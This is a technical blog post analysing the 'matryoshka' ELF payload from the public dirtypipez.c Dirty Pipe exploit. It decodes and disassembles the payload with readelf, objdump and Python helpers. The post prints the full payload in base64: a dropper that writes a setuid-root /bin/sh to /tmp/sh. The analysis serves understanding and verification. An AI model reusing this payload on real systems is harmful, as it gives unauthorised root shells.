reading matryoshka elf / dirtypipez
While looking at the clever dirtypipez.c exploit, I became curious how this elfcode was constructed.
On March 7, 2022, Max Kellermann disclosed a vulnerability he found in Linux kernel 5.8 and above called The Dirty Pipe Vulnerability. Peter (blasty) at haxx.in quickly created a SUID binary exploit for it, called dirtypipez.c. This code contains a tiny ELF binary which writes another binary to /tmp/sh: the ELF Matryoshka doll.
I was wondering how one parses this code, both to ensure it does what it says it does and just because.
The code looks like this:
unsigned char elfcode[] = {
/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
...
With a leading explanation:
// small (linux x86_64) ELF file matroshka doll that does;
// fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
// write(fd, elfcode, elfcode_len)
// chmod("/tmp/sh", 04755)
// close(fd);
// exit(0);
//
// the dropped ELF simply does:
// setuid(0);
// setgid(0);
// execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
Base64 encoded, the entire elfcode is:
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
AAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAlwEAAAAAAACXAQAAAAAAAAAQ
AAAAAAAASI09VgAAAEjHxkECAABIx8ACAAAADwVIicdIjTVEAAAASMfCugAAAEjHwAEAAAAPBUjH
wAMAAAAPBUiNPRwAAABIx8btCQAASMfAWgAAAA8FSDH/SMfAPAAAAA8FL3RtcC9zaAB/RUxGAgEB
AAAAAAAAAAAAAgA+AAEAAAB4AEAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAA4AAEAAAAAAAAA
AQAAAAUAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAC6AAAAAAAAALoAAAAAAAAAABAAAAAAAABI
Mf9Ix8BpAAAADwVIMf9Ix8BqAAAADwVIjT0bAAAAagBIieJXSInmSMfAOwAAAA8FSMfAPAAAAA8F
L2Jpbi9zaAA=
Let's place that in decoded form in dirtypipez-matryoshka.elf.
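One way to do the decoding, as a minimal Python sketch: the base64 text is copied verbatim from above, and the function name `decode_elfcode` is made up for this example. Only the output filename comes from the text.

```python
import base64

# The base64 text from above, copied verbatim.
ELFCODE_B64 = """
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
AAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAlwEAAAAAAACXAQAAAAAAAAAQ
AAAAAAAASI09VgAAAEjHxkECAABIx8ACAAAADwVIicdIjTVEAAAASMfCugAAAEjHwAEAAAAPBUjH
wAMAAAAPBUiNPRwAAABIx8btCQAASMfAWgAAAA8FSDH/SMfAPAAAAA8FL3RtcC9zaAB/RUxGAgEB
AAAAAAAAAAAAAgA+AAEAAAB4AEAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAA4AAEAAAAAAAAA
AQAAAAUAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAC6AAAAAAAAALoAAAAAAAAAABAAAAAAAABI
Mf9Ix8BpAAAADwVIMf9Ix8BqAAAADwVIjT0bAAAAagBIieJXSInmSMfAOwAAAA8FSMfAPAAAAA8F
L2Jpbi9zaAA=
"""


def decode_elfcode(b64_text: str = ELFCODE_B64) -> bytes:
    """Return the raw ELF bytes; whitespace and newlines are stripped first."""
    return base64.b64decode("".join(b64_text.split()))


if __name__ == "__main__":
    blob = decode_elfcode()
    # Write the decoded blob; do NOT mark it executable, we only want to read it.
    with open("dirtypipez-matryoshka.elf", "wb") as fh:
        fh.write(blob)
    print(len(blob), "bytes written")
```

The blob should come out at 407 (0x197) bytes and start with the `\x7fELF` magic. Piping the same text through `base64 -d` on the command line does the same job.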
Now, how do we read this blob?
$ readelf -h dirtypipez-matryoshka.elf
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
...
Entry point address: 0x400078
Start of program headers: 64 (bytes into file)
Start of section headers: 0 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
...
$ readelf -l dirtypipez-matryoshka.elf
Elf file type is EXEC (Executable file)
Entry point 0x400078
There is 1 program header, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x0000000000000197 0x0000000000000197 R E 0x1000
So, the entry point is at file offset 0x400078 - 0x400000 = 0x78, which coincides with 64 (ELF header) + 56 (program header) = 120 = 0x78: the code starts right after the headers. Time to disassemble using objdump(1):
$ objdump -D -m i386:x86-64 -b binary \
--start-address=0x78 dirtypipez-matryoshka.elf
...
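The arithmetic that led to 0x78 can also be reproduced without readelf. The following is a rough sketch that assumes a little-endian ELF64 image and unpacks the standard `Elf64_Ehdr` and `Elf64_Phdr` layouts with Python's `struct` module; the function name `entry_file_offset` is made up for this example.

```python
import struct
import sys

PT_LOAD = 1


def entry_file_offset(blob: bytes) -> int:
    """Translate e_entry into a file offset via the PT_LOAD segment containing it."""
    # e_ident: magic, then EI_CLASS == 2 (64-bit) and EI_DATA == 1 (little-endian).
    if blob[:4] != b"\x7fELF" or blob[4] != 2 or blob[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    # Elf64_Ehdr fields that follow the 16-byte e_ident (48 bytes in total).
    (e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
     e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum,
     e_shstrndx) = struct.unpack_from("<HHIQQQIHHHHHH", blob, 16)
    for i in range(e_phnum):
        # Elf64_Phdr is 56 bytes: two 32-bit fields, then six 64-bit fields.
        (p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz,
         p_align) = struct.unpack_from("<IIQQQQQQ", blob, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD and p_vaddr <= e_entry < p_vaddr + p_memsz:
            return e_entry - p_vaddr + p_offset
    raise ValueError("entry point is not inside any PT_LOAD segment")


if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], "rb") as fh:
        print(hex(entry_file_offset(fh.read())))
```

Run against dirtypipez-matryoshka.elf, this should print the same 0x78 that was computed by hand.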
We'll need a few prerequisites to be able to annotate the objdump output.
$ grep -E '#define (O_WRONLY|O_CREAT|O_TRUNC)' \
/usr/include/asm-generic/fcntl.h
#define O_WRONLY 00000001
#define O_CREAT 00000100 /* not fcntl */
#define O_TRUNC 00001000 /* not fcntl */
$ grep -E '^#define __NR_.* (1|2|3|59|60|90|105|106)$' \
/usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_write 1
#define __NR_open 2
#define __NR_close 3
#define __NR_execve 59
#define __NR_exit 60
#define __NR_chmod 90
#define __NR_setuid 105
#define __NR_setgid 106
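The kernel headers print the open flags in octal, while objdump shows immediates in hex. A quick conversion, as a small sketch using only the values grepped above plus the 04755 mode from the exploit's own comment:

```python
# Values as printed by the grep above (octal in the kernel header).
O_WRONLY = 0o1
O_CREAT = 0o100
O_TRUNC = 0o1000

open_flags = O_WRONLY | O_CREAT | O_TRUNC
suid_mode = 0o4755  # chmod mode from the exploit's leading comment

print(hex(open_flags))  # 0x241
print(hex(suid_mode))   # 0x9ed
```

These are the two hex immediates to look for in the disassembly: 0x241 for open() and 0x9ed for chmod().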
Remembering the calling conventions, we know:
- the first 6 arguments to functions are stored in %rdi, %rsi, %rdx, %rcx, %r8, %r9 (for raw syscalls, the kernel takes the fourth argument in %r10 instead of %rcx);
- the return value is stored in %rax (and for large values also %rdx);
- the syscall number is stored in %rax.
After adding some annotations, the objdump output looks like this:
0000000000000078 <.data+0x78>:
78: 48 8d 3d 56 00 00 00 lea 0x56(%rip),%rdi # "/tmp/sh" at 0x7f+0x56=0xd5
7f: 48 c7 c6 41 02 00 00 mov $0x241,%rsi # O_WRONLY(0x1) | O_CREAT(0x40) | O_TRUNC(0x200)
86: 48 c7 c0 02 00 00 00 mov $0x2,%rax # __NR_open
8d: 0f 05 syscall # // open("/tmp/sh", 0x241)
8f: 48 89 c7 mov %rax,%rdi # use return value (fd) as argument 1
92: 48 8d 35 44 00 00 00 lea 0x44(%rip),%rsi # "\x7fELF..." at 0x99+0x44=0xdd
99: 48 c7 c2 ba 00 00 00 mov $0xba,%rdx # inner_elfcode_len (0xba)
a0: 48 c7 c0 01 00 00 00 mov $0x1,%rax # __NR_write
a7: 0f 05 syscall # // write(fd, inner_elfcode, inner_elfcode_len)
a9: 48 c7 c0 03 00 00 00 mov $0x3,%rax # __NR_close
b0: 0f 05 syscall # // close(fd) // arg1 was reused
b2: 48 8d 3d 1c 00 00 00 lea 0x1c(%rip),%rdi # "/tmp/sh" at 0xb9+0x1c=0xd5
b9: 48 c7 c6 ed 09 00 00 mov $0x9ed,%rsi # 0o4755
c0: 48 c7 c0 5a 00 00 00 mov $0x5a,%rax # __NR_chmod
c7: 0f 05 syscall # // chmod("/tmp/sh", 04755)
c9: 48 31 ff xor %rdi,%rdi # 0
cc: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax # __NR_exit
d3: 0f 05 syscall # // exit(0)
d5: 2f 74 6d 70 2f 73 68 00 # "/tmp/sh\0"
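The `lea N(%rip)` annotations rely on one rule: the displacement is relative to the address of the next instruction, not the current one. A minimal sketch of that calculation follows. The function name `rip_relative_target` is made up for this example, and it only handles the 7-byte `lea disp32(%rip), reg` form seen here.

```python
import struct


def rip_relative_target(insn_addr: int, insn: bytes) -> int:
    """Return the address referenced by a 7-byte `lea disp32(%rip), reg`."""
    is_rex_w = len(insn) == 7 and (insn[0] & 0xF8) == 0x48
    # Opcode 0x8d is lea; ModRM with mod=00 and rm=101 selects RIP-relative.
    if not is_rex_w or insn[1] != 0x8D or (insn[2] & 0xC7) != 0x05:
        raise ValueError("not a 7-byte RIP-relative lea")
    (disp32,) = struct.unpack_from("<i", insn, 3)  # signed 32-bit displacement
    # %rip already points past this instruction when the address is formed.
    return insn_addr + len(insn) + disp32


# The three lea instructions from the listing above: (offset, raw bytes).
for addr, raw in [(0x78, "488d3d56000000"),
                  (0x92, "488d3544000000"),
                  (0xB2, "488d3d1c000000")]:
    print(hex(addr), "->", hex(rip_relative_target(addr, bytes.fromhex(raw))))
```

This gives 0xd5 for both `/tmp/sh` references and 0xdd for the inner ELF, matching the annotations.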
We can examine the inner (Matryoshka) ELF as well, which is at 0xdd:
$ dd bs=1 if=dirtypipez-matryoshka.elf \
skip=$((0xdd)) of=dirtypipez-inner.elf
readelf(1) shows that the inner ELF's code also starts at offset 0x78. We can read it from the outer elfcode directly:
$ objdump -D -m i386:x86-64 -b binary \
--start-address=$((0xdd + 0x78)) \
dirtypipez-matryoshka.elf
...
The only data there starts at 0x18f (0xdd + 0xb2):
$ dd bs=1 if=dirtypipez-matryoshka.elf \
skip=$((0x18f)) 2>/dev/null | hd
00000000 2f 62 69 6e 2f 73 68 00 |/bin/sh.|
I'll leave parsing of the assembly to the interested reader. But it checks out.
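For a shortcut, here is a rough heuristic rather than a real disassembler: it scans for `mov $imm32,%rax` (bytes `48 c7 c0`) immediately followed by `syscall` (`0f 05`) and looks the number up in the table grepped earlier. It only works because this particular code loads %rax right before every syscall. The names `syscall_sequence` and `INNER_CODE` are made up for this example; the bytes are the inner ELF's contents from offset 0x78 to its end.

```python
import struct

# Syscall numbers from unistd_64.h, as grepped earlier.
SYSCALLS = {1: "write", 2: "open", 3: "close", 59: "execve", 60: "exit",
            90: "chmod", 105: "setuid", 106: "setgid"}

MOV_RAX_IMM32 = b"\x48\xc7\xc0"  # mov $imm32,%rax
SYSCALL = b"\x0f\x05"

# Inner ELF, file offsets 0x78..0xba (code followed by "/bin/sh\0").
INNER_CODE = bytes.fromhex(
    "4831ff48c7c0690000000f05"
    "4831ff48c7c06a0000000f05"
    "488d3d1b0000006a004889e2574889e6"
    "48c7c03b0000000f05"
    "48c7c03c0000000f05"
    "2f62696e2f736800"
)


def syscall_sequence(code: bytes) -> list:
    """List syscall names for each `mov $imm32,%rax; syscall` pair, in order."""
    names = []
    pos = code.find(MOV_RAX_IMM32)
    while pos != -1 and pos + 9 <= len(code):
        if code[pos + 7:pos + 9] == SYSCALL:
            (nr,) = struct.unpack_from("<I", code, pos + 3)
            names.append(SYSCALLS.get(nr, f"syscall_{nr}"))
        pos = code.find(MOV_RAX_IMM32, pos + 1)
    return names


print(syscall_sequence(INNER_CODE))  # ['setuid', 'setgid', 'execve', 'exit']
```

That matches the order promised by the leading comment, with a trailing exit in case execve fails. Arguments still have to be read off the real disassembly.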
Likely, one could make the ELF even smaller by abusing the headers, but that wasn't the exercise. Although it could be a fun one.